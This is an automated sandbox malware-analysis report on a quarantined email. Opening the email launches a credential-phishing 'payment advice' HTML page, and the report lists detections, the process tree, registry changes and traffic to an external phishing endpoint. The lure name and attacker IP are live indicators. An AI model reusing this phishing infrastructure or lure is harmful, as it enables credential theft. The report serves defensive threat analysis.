Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Quarantined Messages(11).zip

Overview

General Information

Sample name:Quarantined Messages(11).zip
Analysis ID:1530598
MD5:03430da0f93aa351348a314954c0a8f2
SHA1:34acfc8fb8eafbfa475cee8ef8c47698a53243f0
SHA256:d76ddc960eb2350fda3b6921c19d40b1ae5e6f3a4cb2433dfdea3f10f03461e2
Infos:

Detection

HTMLPhisher
Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Yara detected HtmlPhish10
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
Invalid T&C link found
None HTTPS page querying sensitive user data (password, username or email)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification
Sigma detected: Outlook Security Settings Updated - Registry
Stores files to the Windows start menu directory

Classification

Process Tree

  • System is w10x64_ra
  • rundll32.exe (PID: 6720 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • OUTLOOK.EXE (PID: 5152 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\AppData\Local\Temp\Temp1_Quarantined Messages(11).zip\ca56da36-71ea-4ec2-9820-08dce887adf9\1c99d929-e95f-2462-0a44-8852be668566.eml" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 6688 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "8629CF2E-5B64-48E8-ADE3-CF97CDFF8DD7" "A79F8F49-6F5B-42C1-B65C-05AFF02BDB33" "5152" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • chrome.exe (PID: 3364 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\KMDIZEAG\Payment_Advice_Note_Riccardo.nobile_5827096209CQDM.html MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 1036 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=1944,i,7005086442058721016,18223057916398399266,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup

Yara Signatures

HTML

SourceRuleDescriptionAuthorStrings
0.1.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    0.2.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security

      Sigma Signatures

      Sigma detected: Office Autorun Keys Modification
      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 5152, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1
      Sigma detected: Outlook Security Settings Updated - Registry
      Source: Registry Key setAuthor: frack113: Data: Details: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\KMDIZEAG\, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 5152, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Security\OutlookSecureTempFolder

      Suricata Signatures

      No Suricata rule has matched

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      Phishing

      barindex
      AI detected phishing page
      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/KMDIZEAG/Payment_Advice_Note_Riccardo.nobile_5827096209CQDM.htmlLLM: Score: 10 Reasons: HTML file with login form DOM: 0.2.pages.csv
      Yara detected HtmlPhish10
      Source: Yara matchFile source: 0.1.pages.csv, type: HTML
      Source: Yara matchFile source: 0.2.pages.csv, type: HTML
      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/KMDIZEAG/Payment_Advice_Note_Riccardo.nobile_5827096209CQDM.htmlHTTP Parser: Number of links: 0
      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/KMDIZEAG/Payment_Advice_Note_Riccardo.nobile_5827096209CQDM.htmlHTTP Parser: <input type="password" .../> found but no <form action="...
      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/KMDIZEAG/Payment_Advice_Note_Riccardo.nobile_5827096209CQDM.htmlHTTP Parser: Title: Sign in to your account does not match URL
      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/KMDIZEAG/Payment_Advice_Note_Riccardo.nobile_5827096209CQDM.htmlHTTP Parser: Invalid link: Privacy statement
      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/KMDIZEAG/Payment_Advice_Note_Riccardo.nobile_5827096209CQDM.htmlHTTP Parser: Invalid link: Privacy statement
      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/KMDIZEAG/Payment_Advice_Note_Riccardo.nobile_5827096209CQDM.htmlHTTP Parser: Invalid link: Privacy statement
      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/KMDIZEAG/Payment_Advice_Note_Riccardo.nobile_5827096209CQDM.htmlHTTP Parser: Has password / email / username input fields
      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/KMDIZEAG/Payment_Advice_Note_Riccardo.nobile_5827096209CQDM.htmlHTTP Parser: <input type="password" .../> found
      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/KMDIZEAG/Payment_Advice_Note_Riccardo.nobile_5827096209CQDM.htmlHTTP Parser: No favicon
      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/KMDIZEAG/Payment_Advice_Note_Riccardo.nobile_5827096209CQDM.htmlHTTP Parser: No favicon
      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/KMDIZEAG/Payment_Advice_Note_Riccardo.nobile_5827096209CQDM.htmlHTTP Parser: No favicon
      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/KMDIZEAG/Payment_Advice_Note_Riccardo.nobile_5827096209CQDM.htmlHTTP Parser: No favicon
      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/KMDIZEAG/Payment_Advice_Note_Riccardo.nobile_5827096209CQDM.htmlHTTP Parser: No <meta name="author".. found
      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/KMDIZEAG/Payment_Advice_Note_Riccardo.nobile_5827096209CQDM.htmlHTTP Parser: No <meta name="author".. found
      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/KMDIZEAG/Payment_Advice_Note_Riccardo.nobile_5827096209CQDM.htmlHTTP Parser: No <meta name="author".. found
      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/KMDIZEAG/Payment_Advice_Note_Riccardo.nobile_5827096209CQDM.htmlHTTP Parser: No <meta name="copyright".. found
      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/KMDIZEAG/Payment_Advice_Note_Riccardo.nobile_5827096209CQDM.htmlHTTP Parser: No <meta name="copyright".. found
      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/KMDIZEAG/Payment_Advice_Note_Riccardo.nobile_5827096209CQDM.htmlHTTP Parser: No <meta name="copyright".. found
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 154.12.225.163
      Source: unknownTCP traffic detected without corresponding DNS query: 154.12.225.163
      Source: unknownTCP traffic detected without corresponding DNS query: 154.12.225.163
      Source: unknownTCP traffic detected without corresponding DNS query: 154.12.225.163
      Source: unknownTCP traffic detected without corresponding DNS query: 154.12.225.163
      Source: unknownTCP traffic detected without corresponding DNS query: 154.12.225.163
      Source: unknownTCP traffic detected without corresponding DNS query: 154.12.225.163
      Source: unknownTCP traffic detected without corresponding DNS query: 154.12.225.163
      Source: unknownTCP traffic detected without corresponding DNS query: 154.12.225.163
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 154.12.225.163
      Source: unknownTCP traffic detected without corresponding DNS query: 154.12.225.163
      Source: unknownTCP traffic detected without corresponding DNS query: 154.12.225.163
      Source: unknownTCP traffic detected without corresponding DNS query: 154.12.225.163
      Source: unknownTCP traffic detected without corresponding DNS query: 154.12.225.163
      Source: unknownTCP traffic detected without corresponding DNS query: 154.12.225.163
      Source: unknownTCP traffic detected without corresponding DNS query: 154.12.225.163
      Source: global trafficHTTP traffic detected: GET /7353914071/next.php HTTP/1.1Host: 154.12.225.163Connection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /7353914071/next.php HTTP/1.1Host: 154.12.225.163Connection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /7353914071/next.php HTTP/1.1Host: 154.12.225.163Connection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
      Source: global trafficDNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
      Source: global trafficDNS traffic detected: DNS query: code.jquery.com
      Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
      Source: global trafficDNS traffic detected: DNS query: stackpath.bootstrapcdn.com
      Source: global trafficDNS traffic detected: DNS query: 7353914071-1323985617.cos.sa-saopaulo.myqcloud.com
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
      Source: unknownHTTP traffic detected: POST /7353914071/next.php HTTP/1.1Host: 154.12.225.163Connection: keep-aliveContent-Length: 13User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: */*Origin: nullAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Data Raw: 64 6f 3d 75 73 65 72 2d 63 68 65 63 6b Data Ascii: do=user-check
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65370
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65371
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65393
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65374
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65375
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65372
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65373
      Source: unknownNetwork traffic detected: HTTP traffic on port 65371 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 65373 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 65375 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65389
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65368
      Source: unknownNetwork traffic detected: HTTP traffic on port 65368 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 65383 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65387
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65388
      Source: unknownNetwork traffic detected: HTTP traffic on port 65385 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65369
      Source: unknownNetwork traffic detected: HTTP traffic on port 65389 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 65387 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65380
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65385
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65383
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65384
      Source: unknownNetwork traffic detected: HTTP traffic on port 65370 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 65393 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 65372 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 65379 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 65376 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 65374 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 65369 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65379
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65376
      Source: unknownNetwork traffic detected: HTTP traffic on port 65380 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 65384 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 65388 -> 443
      Source: classification engineClassification label: mal56.phis.winZIP@18/38@8/151
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20241010T0328520416-5152.etl
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile read: C:\Users\desktop.ini
      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
      Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
      Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\AppData\Local\Temp\Temp1_Quarantined Messages(11).zip\ca56da36-71ea-4ec2-9820-08dce887adf9\1c99d929-e95f-2462-0a44-8852be668566.eml"
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "8629CF2E-5B64-48E8-ADE3-CF97CDFF8DD7" "A79F8F49-6F5B-42C1-B65C-05AFF02BDB33" "5152" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "8629CF2E-5B64-48E8-ADE3-CF97CDFF8DD7" "A79F8F49-6F5B-42C1-B65C-05AFF02BDB33" "5152" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\KMDIZEAG\Payment_Advice_Note_Riccardo.nobile_5827096209CQDM.html
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=1944,i,7005086442058721016,18223057916398399266,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\KMDIZEAG\Payment_Advice_Note_Riccardo.nobile_5827096209CQDM.html
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=1944,i,7005086442058721016,18223057916398399266,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: apphelp.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: c2r64.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: userenv.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: msasn1.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: kernel.appcore.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptsp.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: rsaenh.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptbase.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: gpapi.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
